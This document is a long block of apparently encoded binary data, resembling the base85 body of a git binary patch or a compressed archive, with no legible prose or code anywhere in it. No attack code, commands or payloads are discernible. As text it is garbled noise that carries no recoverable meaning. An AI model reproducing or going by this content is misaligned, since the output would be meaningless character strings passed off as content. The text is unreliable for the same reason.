zBa#Js#$(bXc9-2Qt2=g=S>T%cS>c_XRnC1o)6KB`tgxqgBYk_hra#(%9XT(|AI(GF z?~2PG%^}_wAeD1D?~9;Ic3|5Ji2VglZ!pK{j{sr$u7@mtWTPOaKZ;DjfcPkAX_G)U z_#-5z?ZeU^$=n+Li08p}$4RihP_Y*L(|n|!{?D`g)7_STvhoPbd5yzA&EfuOp~Wuq zPY-baw2=F!g-&goWA{(OB=Ir3f0E1}i6SC#lF=I{8Bb6d08_C47zo?Q zv&Z_d_qi-A)_+L01|d7PYQ_2%Es*)7%w+LAP%h$maVz5ZFJ#|Q91luk#qro^LVkK? z#iMm#1)91y1piq2F-SuvVjRDem7qAjKV#xcZ1*YhSM8@)Wf41ZFW$QIJbuvsmA=iz>ryU=PdVwU&x;Cf$?fxu`BNrVJs) z#}}_55WL*Q50-Q}FE}jkYj(l&!w&3%6O2S&$+N5i2G7Y}HHf4JpS6Y~K<^Fw&azc6 z(o*sWKA{)%o>LpWC6l4eE;z@9-3qm~n&zfvnd)Jk^BwJORcmXvA(la5z`%;HAK<{6 zuEUn=+VSWdk4|mSTVevwxLWbN<#OPu_&AZ~y^&BDh@xZ~R)fsa3YiRi%$oIe8|kV^ zx_?uA?Y3lf{a?ga_8(Yy`7*w;UnqhmDk6$Q8Gkj1)l4%BlHnswD3&F%eBFfVdYzc} zOiKvtP-J8R-$}*D1imH4zYquGFPI5@OY8+40iK5XUe*5~40j1A7RZ2aiM`+)Tb{y_ zw9BGJ`H&}M*d@)u3cF}MTyV3@biO14-xI|*eBgVcS5nO6lawWeUbHAnQvDCXh*zNo z0SX@zebICTh)7lv28f;V&;0vuRV(_==TqbqpQE4WWs~BopG~3_s%1<(!)z;o`I=VN znE13A7Q?S_;m3%XFIrB%=vDMZ1(TQ~N5NIo5%WbvNGa*5mV zo`nUj?L7+!MDKLQKQCE*-Cft*ff)>4pdWK4SNQVqT$aYPw3(()hR2l&Mxm*rr%GUj zXS2dapg*{tyjSVbz_bU&0W6F00G0q8z*5%(kAfh_|0o>5!Uno@h|WQ`zGC!jMcrCS zy7ji{IPU}AoEeVY{+1czY>1VlH}9eh-sF1o7<9`7Y~Wqen|GbPveLBPNTkqv7KYxd zpo4zE(0eti#~S?qju}tr9hnpgy_(kZw$`lk4b%7tP(Ay#|Ff3N+9g!>uy<^fO zLhqHbx+CiL05=N&np+W<7|xy_pt zc-MSxqbY1iRK8M0Jr?DC2yD~io1rYYo=Ji82Pi2L_V2KK{y&ofXUNDeQ-g4if$b!S zvyxd5Jd+XYMUpH2fEsH}49KB^cyfcSQdNv~R}-nsM+1!F*cBAVisv>DJ!Cz%v8qFO zip_}d6p-1Lo8fl;dGH8LtifzUo8q7`X`c1CEeC%}KcyC{m`4~}u5|{t}h_q}y z>ccv&Wsh5H#Oq1X);s<8N2X&<1_{!aT5B>k3SzFwM5f@v_$X*;lYkG_WRRTxOJ#5% zb8D^45_96P?oR3d}_)V$;u-z=Piykn2-4Q^SQ+y8-JeQYcQYl!RK?Q9e-pW zd;qsxgZYS}gwJGaY(%Li*I;Von*Pi<)?n75ZTmd58E66<1zM<~M?7TS@4zevUWeFV z;(HMpl*m(q@T*n3;6Xbi3%r_}QcGd48Riyyd3j%6ChReTB<$Sr!A6IUyik!^kL4C= zg{JDJ#xczib=L}viYyO?atP>Q0eEq_*+JOP*Ys^BGr}6?<}iENj6M2AT=ue&v~??r zcoWywCDt0|R?^n3PHo-jv==~F{?{{>z1S#-X)lo}7!V%?Eo~CW0eeAmdOR!bMdsGB zhKYIB8s;LfpDjo|{oica&zF|{Sa}5IyvAWa8@c^_WwFcb=SglqUvc~S%4t6v?e??9 zZa*8zLbk}(nEm8P`>By@`s>GGKbz2g8dz(XaK_wr)WK~g#z{NOurubin=#^}ZPd%( zA}L?yQIN*e4U!dyV3+#$1Y}O=d*po& z{;vX!3&dI(-c1tNhqQjjCGa%JeG$ri9|>WfQwY0FTQCTO&_cv}Ox}rAy^PG(=|l^J z0`QBWz;^`S%i((^oTRv0lE9?c$Rj>cY=KRGE~y;f8_`C&`&}iAR(|R$tG7`awDzEN zX3%#i-^NgJkc`##L!0i<0dS_)%IZN=uB;x090S+T;2qL$==(;b+dq(Q8*J?Dn3=~S zpMyvntet?XS55yRa1uWf*-McdLI z-YR0h%T7rbt?dEX*4iH8z_qgaFvHw}QqHdRu=WdVK@l_futuXErC9hmnK^;_q2{l?;CiX`7J&wiw z-z^n9N-BtbaF*fOjd*@19sJ9b^HAu6+u8NC=mTs6wm!M}OVx?EtFMCDbHdc{&Ph@| z)H#1+E%;wB3f`*$?d?eb+-c>0G}&8lF}3Rrv^8Mkw(5mFRiM|u3%&kbmKW2*;}Sxx zu?~5G(TNQa4cHo)4&GCvS6USKq7ROWN}8wf>(k(TAqd! z-J_#~1d8CSQv_%2x=|(RBL1r#{GXBh|H1hO(qaD+=!OF6e}ycL%V!`h*aUbledog? z-;aftTJLs&oD^jqyFB>9sP1vjU*VqOaeDjAVD|;d^oxt-1?f}>cU4i4o}cCb?Td2! z5C32Y6!wNZ@Kfpb(6K5@VPGGRL_tQfS_wb4uvzoS6Mzai#`0%gvI2JiV7QxPV*{MD zZ^%Vy{9();?9!MJX0od}6T(y#!UpFBCpC@Xc~is6;KLKats!~#pNr949yoimuIbPB z@Pn%gJaY9DnNBl8UW;o(^*;k#--?Yw1{*3Wy~y?s2iu0f5QerrooYva4+if=9=^KY z8WNtm9)BB;JT8mSdqN2odXMUV7SNxYd(_GVM8C^{-s5kJ=-+kKihd=cZ|C7p z8Hyp1P&dKfp3rAY^a-Iv3q2drmjU{z*eGPAC#aQ)i2geV`UHOmMBlk~^wUxJ9XI?yNiOA$StVvnjNA3U}2aNB^% zRpOpUoki>?apChMXYs1>_~0lEI0T;%g#j<*3jg~{a%w1bJbY?M4?Hx$!%O>$s4UXxBJ`VoO0WQ#W z?FwI>7T5-h;6`B`J>v>0=wA+}Q0NA-#X+~YX(gTTEn@xty$WmTfGW`})bxDAq?X)) z^E|NKH@8`v{+`@=Z902OyRzb*+@v8F!MR)ToTV@OZOeY=v)`9^T3oO<0M5KEDZpAe zWiI?}R&;eq4yL-csprYfD}&v~?4}G}SuasA=lrtm2)w9lGye7}`vfu%09Lma*q;Ee zWdMNTeD}1rx&k7xg@}Obr<&I{Fy^;YxL~$A2u5ZwZGN z!wN3;s=;)YYlFjEV*Z9nG~krtx&WIKq=$>0ATgOp%o!}0pRWcp1tmC>pjNX)tJ4+QZH_EaQCuTmPhwoqn!{?IQ{`31C`wucl>p$6j&Rvsxaue}u?`dN9Gp zX081r7VVIkDKlBH1kBoEC%hH!hwhhsPO%f{n-x1@qZm7#<*^f}MW`;tPHB)%rE~_Q zK{^;m>8XyG(r4*&woRYgNPYHM`V3D}gf{!6HYbucC!jWyF6Sz06QRrLNnD9fpjO`xIRG%N42^BgHD}$WRS+q$zr-Gt5gRXQo5+41OxjUF~8? zaAnuB8TgOP2XJ%8bp)~wBMM%N2=0=SdHhcosZV26?DF>7nX! z52ZN9yh$2e_A#%iY!Liao_$zr=5$JUD}B;oY1`zJnmc?_Q|Xh^xK9G}ht);!L#-g) zlG5iu+An-kmeVJ-v3ycHPi=8p8&AwQtr3lE4daT_+zQiR3vfB|5vD%}PVd2kCG>PqTQY(+WCY3F2(aOusMj6C^%~B_DqkV>8XL8%5StL)2Go+Yr~!-F{Fm&%J*1{;z70WAN5nnV?}E;sf%D1sgMXfXDe&TbtgQp49` zOxKVwlt>M)pIS4fTjHY2uHQs$3D@ruk0YkDSb@w^yYjbnDnH%|-TzVQ2kCx0hwitL zx}U>!A5CwiE~GmO-EW$TFFm(lKhryT>}M^O_hi!3@W206#W9oVY+1;8 zXd%wHud^pc+?P+*krzkYXDG0=@{=msWfD8z8q;4On|PFLqBGe%!tQ|orFedjC%6?%;sS^SdvJY)2J$OawGsgS3nA-bSxpT>nrsN7!A1}b zb|D+;Oj>-3YcWz7>>jSE^)1_>#+>dKQ4#8k;C2%uOrv@I7_V<<&+@>oaYT0|RQle}~IC`8jAOiTJ)y+RHO&FL`7y7fO5a z*J3ZQ_j5&yn%fk|BGam25kCHvKx`|R;+7pJv!@i^kwBT{F`Ue0saOJ`{>t+>5_ zT7}Lh8|en=u9Ut2(%prpzOU!*?Xe0SM?T+@Fvh-zfPPo?Lahy9#v-|YIA$a>?c*Hod_nxd}rT2YrfM{ zwgLLm&*@(+)R5WV?q7R3HKv#Fukg;+FH)|gFTEZ5(o^b7Tdpr4`p~7MBbPzCFQqSm zbRSAz0qM(y?vy%pXMm+UgFLmx83Q~K;tWfBx{~&s7iXN&joIC=s%V=@XNboUXTVnZ z-xT{hK?6vSu9SK-jO!6(lx)CoV3@~>Gv4EIM!_@~^!Liwc&_Ej1=aFs33DsW!#VPINnRUmR;XL`*ifh`J{uxNe4$s9lVa~ zAY_#MMe8}&355z>&r+V?&+y2+Da(M{&=pP=@1b$Hmtg)z zOm}Q$3MzQnwL;%JGIfUyyM&nzPJ0b(0QT<^{w$8a>L!6ae*q`-PL;2P%1;T_s02RT6LIc@uxg zz9gL->CnmHQYSCsItkq!8bi7_8q%YL?p@;4y>XWA-RP-pTpj0$F|PI_&v->#bv8z-9KjX=0r_$mpLKon~-ErTXX3P~#`l2#(K#5`){G1ST{NGk(UD=(|*L*avm zqr!A@oNNtrGT?Eo}>eeYw7Z8idA^zTOP! zn}og&0)4eMr%i&Y?$BgFw?aav5cC%K(L=YwPl`Kq8~*B{sUFAalR+#U40`xsU-E!8 ztRAfNh?CN-*B9n`@X)s5FnPP%-WorojemEzV;z_Of2?Mp5!}IthSxgV=|S(#*wNUU;=*!ViYr;c@&gFCevIv(J`=&^$m3idF(s(yafa@^Ry@uYeL`Z*wd6?p2g#1N$o{ z2kQ!Kfo*p2z+OPRXNazxfxPZF1x9jvRTY=($|v8>_rif$|G0|b08YRTuaEx4F2NQAd3|sM&kUBe0)aX1%q}oc@)e?4Uwn$}4SfVU<_zsau zpCwX74A$-kNKKw4=o@^Opx{oIi>EU05U_o(i&S=!$elM=z@|(SsnT?jY9~{7R*2Nw z+ZAPPKBR)l)JlSK-xfuA>JY%HUJ&Jqx{1`FHz<{&^m$&uHr`1RHF*M0)2-f5IFl!OdcV>zU*`cSm@={iMeyBbm#H+1n-y<0`@ubUL* z*#^*;?dmDY=pse=M)`f8=;=eFM7cLuD-E#jSB&!xuvbLswu0&01K5{$2sz*Vg2){= zTGTyRA#(3ar_{g7?ym(7UxvtCGh1-JW0Qcj$q=nPv`ta2It{6#n*~Q-jseXE>d$Nt zvLCraq?&M!m^AJbtsEUiEf>241u4pgbWv`5hDi0PPpLAOC5;XBMQ%S?V`q+N`76oq zq17TaQ`VR)TmDnlP5fAB?C+Y2FrT;2@?1z-fQBJW|0_Znx+$eI_j}fUEn*@$Kq_11fxGc;B8H}AFXx=xM zXl|su!KqJCZn{%w;!Cn_)}17c6y?w5M01KVDkM_PuNJ8(BSdQXR>51ZKZSHxr3=q6 zxsiaan<-%Jn+R+}b_pMmI!wSC%ogKT{rco5``D~|(P&X)?DrzoEMIuc@hgRNKjQZL zgKE`Px!+AuIx_p+fvF=06`q>^j!0F=+-`pg*p2Usl&?%td|gpOTLkQZts?d17LmLC zn1H=`j9@v6kNdh5Wrf81%^H!~C1K@~mK|jx^~(byl_;^b+A4bRhLJ*kE9Gc#VY-n0 zg;PmSn<_v1UCORsAoV@#!B&Nkn#e{|N;Sw8se4vZuA!v-Ok)a@MiUomY+dEWR2LuV z4!kYKyrhswEtw)xvu7)O9DItEqjB)-N|AcKffyTqPZg=J-W9p)wu;n=VIp;#EVp+i z!RjjAw+P=k;{h>BhUDmCZWO75FN@UWYenia8E>4ICcMw}OXXNLMvR=D)(Y5zpNZ7& zOc^aT7pcR|MCt{Z+qJPsCCOB9j7YVTsil&ZT=Os~N?mCgG{6M5!yyYAvMUEs*WNN$|KYGg4r_xjVta$AQF$TQ% zh47PaZV~=8Rn}Ex%d;fxaJopfmA?JHgFWiNZ9+c#8?qX zCpkA#9+)F?e;F^Lg6{7Kf0`=ep>t&FqxvFZO!-07ox4p?Fj0EZ=Vl4mdopSs$M|?3 z`AB;}q^7+keC#5bn3b*EgERkxuW<>;PxHvi0iq&g^c@yNL&!*3Muqt% zK$zzpiS206qYSdu1~CzGnS{6%FG4D85SYKFDl_l2Ac+cWmG1Spq8wn>elx?AjF4te z2#AM6;Cv8*ByvcfhXkY!Kv>%+Mi6AKlEKSlJu1p%F&IE*$d(&&$SbntCLEIUjDR#} z5ZGnAE1e*4Ru4hS)>)8DRx4H6F^?d_86+Da6Xp_RgyLs5I)m}v$Og$(X0S57SkD4v zqS9U|#WMfwR5+wFy9dZK83Y;2Aak(gp0b_J$^yoFs&dsk1YzTjavzq-yi3q?o^rq9 zYMiP(x|SgSV~_{1*2$Too%57OuvW)A1*99BVFC8)5rUp>%9B{;#9YyGH;@H9)d>oT zU8uaQcvzY0_X)CD>BS&W>yo=f%YBuV*z(&OM9agJ?MUGZoWe@hlHUcjuAL=nO<;33 zD090kGeK$Z0xl-+5$#kcU7-V&bB+nf{mMgF<|N1Uxbm6uEgFI`MbNxM8LmQ^VLJ%2 zUfBl_R%ZMPQRY{rfd*v?Wjl(ifi?qh?GU(3*X0^e_?x7#o-5N0?JQd@+R1b^LddZt z0+PcahaMA%7yl5D!LCw- z?3C?PxVpNZVp1Kvh9C-qT!HNj%&^Mzb3+gQa1B9jR;IXaB3y5aGEW19m6^cifK=ug zR{(K!IU<z#vd&$|TXwORhWI9tP?6H9?nz^%_D->j}tC*H$<9!xNl~J+7Uuy;$ajJZk4**Dlvdq;QnP^{vaRLz&L&3G#{S zTUP=?`g6#3*KSu5LLNCtkV5r4R|-PjUnknx<4V(^Ag5eC5u%*1Abk(0a)fmS*D&k5^;Sl z>8YoV!7__wnM^gHLx1U9&VRcy)yW9im|;O~!&*5ftXd&`I&1kjZy6x75m)|ttIWL! z>5?eQWUCJ$&Fdxh`s$N9c(&`l6uQws-HebIh6+d{br)i9CFRpZ-HVWU$1TWytTnN| zsMS(EiP(S05oP@98LV}_Y$s2xM#$>p79`aG$V$e0-_-<3Gr&j9Y2iZ1BsE`6N66yu zsLa={eAS1L_r4Rgiq!fD*(PgsQimEq&uhCynNI33EOTTtL9$(C>S%=Ayj_&(qTYy* z!y5(UJaqy>-figOkn`0FgtYyW%DkdptX3lAw5-)jz1@Hjwtzzv2LGD1v z)w?aood{XB*@DbNNVn}4OBaVXA-199il#IfR6RAq*^yC z*QzfW;16d$PmsS|<2YoA4e}a7jNKMwB|?^dYe7~SFb?)Ig?z@T?-F)N&op&ALiXwc za<_U2d*|j|LSpx*zhap}LzKB+WrGoejFVg}QZN4wIM=Q6bgEt zQJWy-z&nJiNLiQg50c(&~C(9Iom~<8yN)4EEZ*M*2=M+hJO;|6?Gy&Sefg# z669}Jxi$qMeOW{l`~+&1Yf}-j`auDi%pgLB0GX)V#vowJ!_x_(FvxtwmD$vVkU!Mh zv;_#6wO`?osoEP}(3aI(3DQ8T)Yf~wtmP5Boz2P&tuO&I)%fXvs{Aw-vD z?$I_NWUz$XuWd~LF5Y`XKpxO`V3{M^1mqd*mPCMDyMZ8&Gsx6LkZRggA=T%#c~~ZC z2SL^=?{LW8yM%l`&{krt^^b~LA8N-Ca+mC{bsSRqh=8nT5RgVMW;-uE%c41LBZst+ zkWJcgge=)1Ae*(52)SQEwrH*-9El`ktEM63re_HyfObl|5h2=60XeHp zLdYGm)>-WqgmjP;D(()^_Z)=e%68oD2N7~umNDEGauJfbO>mm(Zi$e`Wvw)KTZFWb*wfr4$*3Drf9kp~#Kn}fX^QeO z%|_ifVXfPC5M-j#l0l%>FC_w!=e`XgPi-K`<4V3em<$#-dW9&{$^8VjGn{!CfHZe^ zc0YrVtD6Z(7xxPY8CM`6=eb`&$fEfQhn(+z9U-na2-4ntfqNxFmOLdO7rEa;$lrb! zhg|GlgOK)3M9V$h?;&Jap^H=4+x-#pK5MGr{SxAX1kX2HKXWb1DvP-sX>WvVxTDFs> zH%3VB<^qzfH$}+1Ed`{p-W(y*B+ae#mI(QuY`IAHBjn%40@6XxL&$TIi_UrhLT1aB zFVKq+@|4ts-g+B^+$W`ancfZ|cT1WF>g^FyC|kZp?}(7oQqCjw5`>gXTsP>Q5HeG8 zI#KV85LHU-7X3VgY?0VQdN+hjlG-~{?~ag(QlsYR7b4_<#I->0fsj2?e-`UKNg7gy z%kb9J6GE0sX=EAW5wcvC$u%Y*#3kj^!YEGxAJuF! zK_)5%#-tRj2^&)i1*E+(BSm+3tukXCw)4ZeqMaTbvPMEKHSR{pJP8?SEI>%z5&^l! zxQApYz1C>sK7=fk6pk|%A>?w|gA6BRv(ltYrdDwUcdH<)5i}U`7@hsNr=MiO=Fi0YUTvcDR^Q7@y81|=( zS5n|?sJ+h<WHGz=a^iC2Iii&`OGy$nnq)JDm z7eT7h1XKh>6x8p`oO5$G!S;XO@B4fnpY#0YOxrUvXU@!SF1u99Wy77a#@wS)re*8} z>&<;CWl%=SCUd_^DQ&t_wwMQ1%8HDXZRTN>@+2c=hj~<`q*?Bio#q!=?6b!_p;9(v zqF9CXL3bJKYzxZa>zWF#Tuu~ODZLM#t5DYUW93yTpA~ec z>|%eAvRj8ZW2 zw92SFtup#t3RC2GRVnIDDPxt-(x0+cB~_|Y#<*9pYG!Gxs#RO1+|KAvb*qj_sanXL zQp>8RQr^s{r;gP?r3}tk1$C`PD&@5d8`iU$sFc_YYt*-zsTBW=QVpyYDy31zN@-}d z$}MNO$e7`ctT%E?k2I~H+Zv6mcIw%^i@W2@W|)%s+263*tD4JZ)ZD@9k|mG7)lKDj zkkP|VR!{0r##3~$-c%`jGxBt`daIO28P@1#y`}mbSJ|D?-RhSmPfu%LmevET!MQVg zo8H#&EP47^qq3y*wZ^KHI~g;fzcoRn{Fsq4(3+%DHf5~t!PZoj@;oEYP%BWShz#E{ z+?uKSvn!+2NGn98EX_z6Z^fvTDj9M3bZd@Eab)a7p;mg9JTcb1EP0Zx1uEse((an) zTkoorFEVzdFtuIu{<%}MFZGEZg`D3fQt#7Q8 z)K++Rk5o#Z3{R^&pR3ky zuzhAjPUmkbPhmfIshrN=RZ8ECF)iq{ywp<^aHo`X=JCp$r@FIsRvBFOfB6QQ531 z!(M6Y)+_ZSy;9E$Z+lASu}~@a>=QF=nCcv!CC^;vIF%<`h6kAMoaj{+jy?idJ-IBj zN(Wds*$-mh0N8-?BPC6PlFulBzp7gh;0PMtc z`L_X5%D)HLY16M+39uK_`_&~G(TL>YUQ*V8#aCrM0g;7-k|pl}9GEO1Wu;8_)KhdI zz%eYhGKA!sFp^7^^yHIY9-hGTkJpgwH(N@NUVbZh2Gix=D4fai92YQMZz83D*3YF~ z1e|UL&=sebUrUlzJCN*xlVV6o0Y|$7RO=_8Tnm89lXd8fyVrG;O<2D59>5)x-R1%O zi1l5cMdg0@Qa{%Ud$N z21NV;P!7w~owG%giq0JNMUpbpy8>8-=bLjY~D-k#_kI$(M^>~|NG zCD6`2Q4X9h=b-?xLiR(z7t29CNBaeGKI^b|ft)7-hJHZxXUBQd2lEvSAp6efN$Y4% z2WbyK@M77!9gWXlr;{CqV!yl>0gOUujuHkIgW7w~L3+4LM z;kCs8F_=CF&%TK$&s_mXK{@X{z+9AdF}`{irQ-y^Vp$$zsb$#zBVPloLRn@h`U7dN z_W?d-d+bIjpZ^fbxtM+erL@BZl;=@@&1OHh-4^5!${w#3#5r!WR|KcGz6Nl2N_W>Z z^?co3*VOZMcWqM7)!mgxJy&;Ekb2(kuJy_u-CZrzb9Q%)RQBrbday`7Z%ugUBcG$Y zE8kMNUc0-BVL!K_Y^BDtyQ_v8zwWN(YW%vpX2|D2xgGUCVYx@|OS{*Edm-{Uy1Tyj zmi_GR@>l)t?)qst&2O@g&i2vSK04b+XZz@EAD!)^vwd{7ht77=*-kp!M`!!cJa}eX zH*!AwImNS{-0R1^j@|1@j;C`f&4)ZwJ?l%(i^5X{)b4@n73Gvpa$X4d(qGO80nJfX z!t@{gKc4luAi>1^B+ljban0jh~{zrF92#|`69nd zzaZdPWAfv}Uy_`_a_Ui%;ltQ3;d*a?<+k+&Xo~U@`ngspkD>qUFxBIa%=)-arv|vr zdy}m1OY+1IBwsEe`PE92p_55Y#r;Q0zhT6cHc07to?>&T|M3@ae6ZaoxGwsj3{cN0 z;M=X#U-BCQ%8sRexBm%X0Oo6SlAhPy?>}Bj&g@59qTjsonozPwX_8HDQM&Y(Qr5}C z`r;%Pouc&p4q~~FNh!Zxms0KrQp){6NEnQFg|9Q>NC06s#|0s>koS{ipP&^QV&k zko#p#_Jq&_LMVA#BU$}pneNFa z+ndbwOF3|kl$raz5a;Ct98W19YQ#Z`Gw1sW%ja1EN-kL=rANPHnDk!(t}P!+nYo`s zxt~M1pF_EyQp)EXnx(%V$aU73q}>0dl>5Jwa{rg|L{;Khg{7o8W%*Q!TbAQI3CH=d zZfaN8sZ{b43xA+>c3`qxAD;EL=LZ>w3h1cfJwG^&abWHIesB!OyFJPe2GYJ6sbo#) zt@iPn@O>!BV!22PgXHhb#S4)P^&y$$OL9|5k~PYZY+9CNk8&i-aQW{XB$wtUS(fXI z;rixseV=iC^|`(_Twh;RUkw;=fOttIl1_}+QH63JADY zNa{V~vI5I(;_;AD{>_Y(U5AjAenHCW%<_fC*uC95Q{v)pUrB4AK<9e6p!mfH(SJ+Eh z_o*yDV3~H1B*<7D`#Gc}^>;&QDgB^BMFDRW_JgPjLiqt7%k9-V!P=@YCujL zx1TZpK-{ml79r_Vv?lD&E%TLy4L`|!r!2gS=iJ|>mW7~)0Dqvo`asIAuCg4*+*>03 zN)6a3_mydRU~w4%-qUJ8E{sQtPV-YzwtEQYmoKKbT`4(_O0O_YKreirswlsmLFbRg zZ(>}AJh8pZkMTeklIuE<{EB7Y&LsEYJgkTEOiPmO+K}9<^Z~9$V`TpVTtit_9SzF9 z#Yd6+cqGX)EPrJ=eGJLfBS>~)PGSz`^0}FpGFM@Ca{dm?rI^Q!AbWlI0-*V{uC7*G zZV&5!;{5M3AL0BbRDSe-DsDpm{fJ~K#a&%_meai0Q%tD*(!L$g4z>7Px2hxA8{AhnEwVc*zas#sG3U!VS zaDBc{&W8Zk+6E+#RFSeQ^eO<*3Fp(@q5$1+9(;oPc-IOzFK=M{UIEw3Ab^!9>#ih! zFaLIFD9)o1m_Cx{Q3{@y%d7cU1Kvh|F%$dWTIKUo`CRy1&GFoyh_Xm`ikEIQC;5Wo zr$^mLc4WQJoAQ1^z^4V}bJYX~wv&qW{fYbJJglc0+G#oRxBCG;mi#r@ukP2wYpp-gH9zyp5 zorjV2Ao-j+jaq*0Y zdmP;3LgRt!3;o>p*ls6o?-0)O$0#qN%r>3Q9eyaaYYIVo<;xJT;Bf(sMuDXcRlt09G!Pm6H6DsRaBlLB7%Ulh=70~T{?-1h;#uJDH7=- zy-5oRJ`25fL84Ttk=_YPhX5kIMhPVJ7(xi?AMe{ges|{VoU?OwcK6P`J9qAzaT}45 zT|FBiSDER8i=OH~iLZ~6cG4Q*ddKT4;3j3b;z;D#{2z>t??K~{Rz>rV$2aB!x;R?k z_aQ0x#;#BIbmZS{*;MXG|JG~rtN<;;yw+&n(*}KCfLOi3(~fQK9d1M_v+ImurR4aw z`op$?SqkZieBHDnZ6B;fP(|KO;tZPS`f$|H*{rf2OSiA!3nJM#7J)ymH z^~eGE0JEFy&yCZ<>CW=$^V6X~`# zBx6~CGeseJA}mZ8I1s)jCcx!$cb+$F;Gk*~vBJf!Diy&Mp6-G;lvq5F*z5vj5jI5S z&~L(CYkxHGw2^-R3qMU7SWInLNbguq+9Irne_ED?*<=~EAo6=5#*350y=@~L!?*3S zg0sx*tfVHmEd{C*XxubeEkA|edp3T{1OT|hsE!-|^D35Lr*VB;(o##MhoaV{hiCSX=A{wXx1jO2c5>ErRU_0HREf<+$Ezsf zmPl5*P3bqCZc0rZJ!!JCR<1kX)(9zGLlpDcJdmm)56&SydDdUIwCe+(k0-X{VCRXF z*ybC*bYTO1C&tTI%biL|Y&FihkN)Z+2EUaxAXI)jkDoYH4=7mYq@%I3XA8hWOeg5> zJsZUotj)pWj|P&bJeUtgXy_ucSF%KqjSs zCeP*qdRIFyo`OOsZm%>mSsPO z<#6a-qcGNu^*{S*n?PrSe#n?TGKq2{>AGfEO9oW&45P2R8%4J2c?AC4l~E8BhF8@} zIj|h2RN_pyz@>}omRm8&oufwnz>{c(w^OADQ~8i zOWsjJq)l*lmu<&W-tz2FSd1V}bov3>l+_ADkm%*>AO8PC3>J?mV+ z>47o^{}7X-i3aRPY z6K!d`#`3$jT(N|XA>yAKAO4EpY$p_2@{ zOB-jr9dl{$f2;#~@2d&1f z^u8WKL_foNnQkHfEHc8ZXB!ERYc`*~!in`$rvGhgi%Tjxu)%yq?gbVn?;~&jIkG&! zweX#9EQ$=*8LRwocSEYcx8%(6LzNrF6CEB4dpKD zqLr$8G>Fy*lNi7JX6RWXHO~iiq9Y&W7Bj9>oW*54zoJ1OdG9kLwGP{t4cibd_o{Puz@tTl12Q-A% zISwN5g;kaxSMq$S@9+29&jYCzkd;1ZuCBZOcb)BJo%f~(u!WRE_W92vs zgu)g_v-)>~3AMYljP~uJ0(T5aroS0515XdGIP;J%_A`ktommnkB7E$rogf3+Ev=i| zk}#=~W2?sqCUd-_wTvsWcq%V718QNk$zGDd$hKsfWo58Yxe*)Y`_41`AB`-jb~5z< ziQJBiwUa*N2uTkeE+=FOI{Pr4X*F+A-Tra)v1XL>-P`(}-~|3h!{A6@wDRZc{pHe~ zkQhMb*_IChz*1QJzTcUs2euH7~*TOo7~fkq$I9!auP5s3?)YS7!X1Vu(`wGRqSN zRsOR0Aj(VS=lI&0!P^*?9GnbZiKyJ1aS#}yvnuFlI$P#IivZ3dPmUBs$%7t@r}-YiQ0nU- zEC(x@;>H?);F$xEfG(7s3|fWxiNOko)MIIW{ov#g^!hjnu&-{h{qy;aFDXItx9-+9KwBdnG ztLOpTl)MqFGdoUPWr5N06HN|`uI^}GYELwTx1w1gOe}tf0H&wwvS8I@fJ}kev?6uf5iHM9ZkV8sZ{31oz6<4>$`jAxw31HGQVU%Vj zSo)v>PHV?K12OQkBAcwRe1}o@dv8})0kcFMl5SGjQmY|iPlz>ThNa(F%ioH%Vj4#f z4;jseby+mHqZJA^9kzzJ{!Y!;IZye1qlo<~umNDx^UVj#GtM8g; zDVo*U%Ou6;)iTNpSPm=C$DWTPGskVmJ|Q8FR9X~FmJG(GGg_C3Tf-g{GB*rd)6IVv zSk^9jvY8`{-jCefu6rJ$OSV4@cD|=}Y$rCwBE^s0V(AeeIyroK+*bh}kE;ZX^=R;X z-Z5GIPU-lg6M%=np8Eo-5PxJ^SAIG`*Q5&Tj^ZgxV^07Pu+7fCnNtN6dE{iJs!I2? zFQ;^vpWqNc-O%I5kL2}`$56#e^*i+rQy>FwUx7cTL+x`~-XyD6HJqq8%JHL|?q2Ns z3fGSR-C-ApvCjB4>Ajhzz8H!YkK)P4S0W!~Gk-icH-jVPn;RcusgZHva}H4Z2^0m0 z`eER`#E30pp6_F7bz;E9>=k&xDf^Hkpjrx2dt^ZQ!+P9Akb-Va#v^oJU+o2p*W+x4 za^q`-WV2r@)Bat&fhVT0l>H=xI{jV#s%J$+m79i-6+2tQ1B#W!N2EL{^3*!3C|kW_ zkn>Sna|FaxLo>#uS&_OT{vQ8cyEgx4+Dh5*{%$QJ;8~Z-aB}8BueuKx8xFECb~R^i)~Psw9Cs=;^f=F?0{@M%T#ab7v!JUii+%z8;OPYssdsjJ&g8 z=xn!Yl(IXqjLz^_bKZbiribb22?O%YjRh~G^&N^MLS4jt=e$FYG`9xkHSEOqt&IiG zJNTa3598SQz>1y~cUUySW5BxE;^gS!oMMvmgB8-q5aK&E1{)iPy#=YUF-F`+-OOt}hx-!|$8VzW%b*quu1#De?N9te!u+a<(nhP4-o6G>m`3v5zQ1M83k{~v%&^}APQGZvEeM&A-3A`1$-c*te z;0ng`$q_l=CSvCS$S8b9fr4aJcMY%}flc#3N9(>cLlXUJej^i!P@j*c?*(_k=vjC` zUiKe+>C$(mb8ihH0w1#@cJ-DfQJgqO5hAPTJfEGAav`?YD%4{DZ-Y*6R>{Gcxxh z(oR@&C%i2YPI;h%6dgLB-_;KAZ!DLHthb_O`x?ntLh)jfgYTT^WY2?kE>$k}-#S6I z0ixl0&l4s;TyMU4pZt`j6e%3QZ^D(EIS;KroAT)uNlcprxI>a8c9_94r&lsy&=>rq zz*`gVPj!8P?Uq^diN3_tiJUpT5Gpgno30O1FsA6M$wzf$%~7D&3!dJ2dnSE%QQJe&y~LN_tZk>rku#0>rI5-MG{Rn`UUR;+PDSM)L-?n#|gg&%`aXW z4mm!$&)k0%!_%Zhz9|*~7uhOD*BG9`T#dS#_6g>TO(_BvFh2*?TmUw4b>IA?{nlV7 zn?Vc+9Q&iO_+dlTp)NkuQYO6M^0*A^0(KTYf+PJKV|j=hVmo)-LwZeO=QRbn(F_m( zf+98c+Pw0hyx<9>g)75=b3+|YIa9c3Hk8l@!${~+S{U7-T;T*RSMRU_{q2J%%28z< z!5>ix^EBJ1=k8}SJO3EC?V3j|iJkewk6j(4==r_M#vZy2?Z5v%1aZld0}Gs2@_o7< zAEiL_c+w^P*jo4xedm^r_Xpm$;VAx;$ke<*rZ3HiM!h42m5MB3Kt3zfhk(izE*9m; z9;Q=Q6+gB1MhHB4pAq#C+dudu1*b?G>zU?X<%rMS7FWOHP^pnN(8JXx= ze^4n_{W)Bd%N#*F+n|7xVc9$s+VIA7ig`O0C)!b)-@Xt6T=3wkUDw$a;o3Z*?M)37 